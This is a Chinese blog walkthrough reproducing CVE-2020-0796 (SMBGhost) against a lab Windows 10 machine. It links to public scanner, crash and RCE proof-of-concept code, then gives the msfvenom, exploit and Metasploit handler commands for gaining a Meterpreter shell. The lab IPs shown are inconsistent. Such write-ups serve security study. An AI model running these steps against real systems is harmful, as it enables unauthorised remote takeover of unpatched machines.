【漏洞复现】CVE-2020-0796 SMBv3远程代码执行

攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,受攻击的目标系统只需开机在线即可能被入侵。从而获取机器的完全控制,利用端口445

影响版本:
漏洞主要影响Windows10版本(1903和1909),包括32位、64位的家用版、专业版、企业版、教育版

资源

检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
蓝屏EXP:https://github.com/eerykitty/CVE-2020-0796-PoC
RCE poc:https://github.com/chompie1337/SMBGhost_RCE_PoC
参考:https://blog.csdn.net/Eastmount/article/details/105350314
windows 10纯净版:(建议迅雷下载)

ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

漏洞利用

靶机版本:Windows 10 Version 1903 for x64-based Systems
靶机IP:192.168.1.4

1.漏洞探测

奇安信检测工具适用于局域网批量检测,快速查找未打补丁的机器

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

在这里插入图片描述

2. POC 蓝屏

https://github.com/eerykitty/CVE-2020-0796-PoC

python CVE-2020.0796.py 192.168.1.12

在这里插入图片描述

3.RCE

https://github.com/chompie1337/SMBGhost_RCE_PoC

①payload生成

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o smb.py

②.将文件smb.py里面buf的值替换到exploit.py中
在这里插入图片描述③ 运行POC

python3 exploit.py -ip 192.168.1.12

在这里插入图片描述④MSF 开启监听

use exploit/multi/handlermsf5 
set payload windows/x64/meterpreter/bind_tcp
set lport 1234lport => 1234
set rhost 192.168.1.12
run

在这里插入图片描述
⑤ 成功建立会话。监听端口后如果一直不弹shell,可重新运行一次
在这里插入图片描述=============================================================================
在这里插入图片描述

展开阅读全文
©️2020 CSDN 皮肤主题: 游动-白 设计师: 上身试试 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值